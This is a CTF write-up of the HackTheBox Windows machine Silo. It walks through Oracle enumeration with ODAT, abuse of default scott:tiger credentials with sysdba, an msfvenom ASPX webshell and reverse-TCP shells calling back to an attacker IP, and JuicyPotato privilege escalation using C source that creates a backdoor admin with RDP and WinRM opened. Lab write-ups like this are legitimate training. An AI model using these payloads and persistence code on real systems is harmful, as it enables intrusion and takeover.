HackTheBox Writeup – Silo – Medium Difficulty
Introduction
This is the first CTF writeup I’ll be uploading on this blog – but it’s definitely not the first one I’ve written. I did a few in the past without having a site like this to publish them on and I got a bit of practice in previous work experience and my OSCP certification. Not much to say here – medium difficulty Windows box. Let’s dive right in.
Enumeration
To start my enumeration, I run RustScan, my favourite enumeration tool. It’s really fast, so I always use it first.
rustscan 10.10.10.82 --range 1-65535 -- -A -sC -sV | tee nmap.txt
We can see a lot of information, but most notable is that it’s running a lot of Oracle services and of course the standard Microsoft web server. My next move is to run AutoRecon, as I know it has a lot of Oracle modules that will do enumeration for us.
sudo $(which autorecon) 10.10.10.82 -v --exclude-tags="dirbuster,nikto,smbmap" -p 80,135,139,445,1521,5985,8080,47001,49152,49153,49154,49155,49159,49160,49161,49162
However, it doesn’t turn up any great information.
To enumerate Oracle, I decide to use ODAT, which is pretty useful for pentesting Oracle (You can find it at https://github.com/quentinhardy/odat). I’ve used it previously on OSCP boxes. Pointing it at the IP of the machine, I use this command.
./odat-libc2.17-x86\_64 -s 10.10.10.82 all
Initial Foothold
Now, I thought I had something, but scott:tiger is actually a default Oracle username and password. So I attempt to leverage it of course and it doesn’t get me anywhere. I can’t leverage the XEXDB SID with the scott account.
I look over a bunch of resources on the internet trying to leverage this but I don’t get far. I can’t use any of ODAT’s exploitation tools, either. However, I read some information at this site: https://infra.newerasec.com/infrastructure-testing/enumeration/services-ports/1521-oracle-db#connect-as-sysdba. I’m thinking, what’s sysdba?
data:image/s3,"s3://crabby-images/3e48a/3e48a88b636d129ffa541768840a91c2038add11" alt=""
That’s relatively easy to understand. It’s a superuser. Knowing this, we can check our privileges using sysdba as a flag in ODAT.
Now we know we have permissions to create or execute any procedure, that sounds like a legitimate way to execute commands. And using ODAT, we can do that. We can leverage ODAT’s dbmsscheduler module to execute commands with XEXDB and get a reverse shell. The tool will spin up a server and all we have to do is open the netcat listener. Unfortunately, the shell is unresponsive, but we have made legitimate progress.
./odat-libc2.17-x86_64 dbmsscheduler -s 10.10.10.82 -U scott -P tiger -n XEXDB --reverse-shell 10.10.16.9 4444 --sysdba
data:image/s3,"s3://crabby-images/cb827/cb827a51bdf6a31d258f0dd61dd035c2961b21d4" alt=""
After a bit of messing around, I found an easier way to get a reverse shell using the dbmsxslprocessor module. This module lets us upload files anywhere we have permissions.
data:image/s3,"s3://crabby-images/f0a5e/f0a5e4eeb3c984e4ff394d559a19eaf4272f982b" alt=""
We can put an .aspx file in the web server’s folder, and browse the site to execute it.
- First, I create an .aspx meterpreter webshell:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.16.9 LPORT=4444 -f aspx -o reverse.aspx
- Next, I run ODAT using the aforementioned module to drop the shell in the webserver’s root:
./odat-libc2.17-x86_64 dbmsxslprocessor -s 10.10.10.82 -U scott -P t
iger -n XEXDB --sysdba --putFile "C:\inetpub\wwwroot" "reverse.aspx" "/home/kali/labs/silo/reverse.aspx"
- Then we simply run a Metasploit listener on port 4444 and browse to the reverse.aspx page
data:image/s3,"s3://crabby-images/47969/47969d3b5564e1218b296891470f37c89367bad8" alt=""
Converting the Meterpreter shell to a normal shell, I see our user is what I hoped for: iis appool, and we have SeImpersonatePrivilege – awesome!
data:image/s3,"s3://crabby-images/4e34b/4e34bffc8b83a987c400d45220d3215c40fe8cf7" alt=""
Privilege Escalation
Switching back to Meterpreter, I upload GodPotato.
Then I attempt to execute it with a custom binary I use (addjesse.exe) that adds the custom local admin user Jesse and enables PSRemoting and Remote Desktop. I’ve pasted the code below.
#include <stdlib.h>
int main() {
int i;
// Add a new user (jesse) with password
i = system("net user jesse Password123 /add");
// Add user to Administrators group
i = system("net localgroup administrators jesse /add");
// Add user to Remote Desktop Users group
i = system("net localgroup \"Remote Desktop Users\" jesse /add");
// Enable Remote Desktop Protocol
i = system("reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f");
// Start or restart the Remote Desktop Service
i = system("net start TermService");
// Add user to the Remote Management Users group for PowerShell Remoting
i = system("net localgroup \"Remote Management Users\" jesse /add");
// Enable and configure WinRM for PowerShell Remoting
i = system("winrm quickconfig -q");
i = system("winrm set winrm/config/client @{TrustedHosts=\"*\"}");
i = system("winrm set winrm/config/service @{AllowUnencrypted=\"true\"}");
return 0;
}
It didn’t work – probably because this is an older version of Windows. All good, though – we can use the original JuicyPotato to elevate privileges. I run the following command to execute my addjesse.exe binary, and we now have control of an administrative user.
.\JuicyPotato.exe -l 1337 -p c:\TEMP\addjesse.exe -t *
I RDP in, which works, but then it stops working suddenly. I’m eager to finish this off, so I just run another reverse shell with JuicyPotato:
- First, generate the shell:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.9 LPORT=8001 -f exe -o reverse.exe
- Then run the listener:
nc -lvnp 8001
- Upload the shell, and execute it with JuicyPotato:
.\JuicyPotato.exe -l 1337 -p c:\TEMP\reverse.exe -t *
Nice! I’d rate that about a 4 out of 10 on the difficulty scale. Not too hard, but the initial foothold could be a little difficult if you’re not used to Oracle.
Lessons Learned
- Always familiarise yourself with the technology you’re using if you haven’t seen it before. That’s how I got stuck on the sysdba step.
- Newer exploits won’t always work on older systems.
- Going for web servers is always a fruitful endeavor when tokens are involved.
Song Of The Day – One Step Ahead by Scattle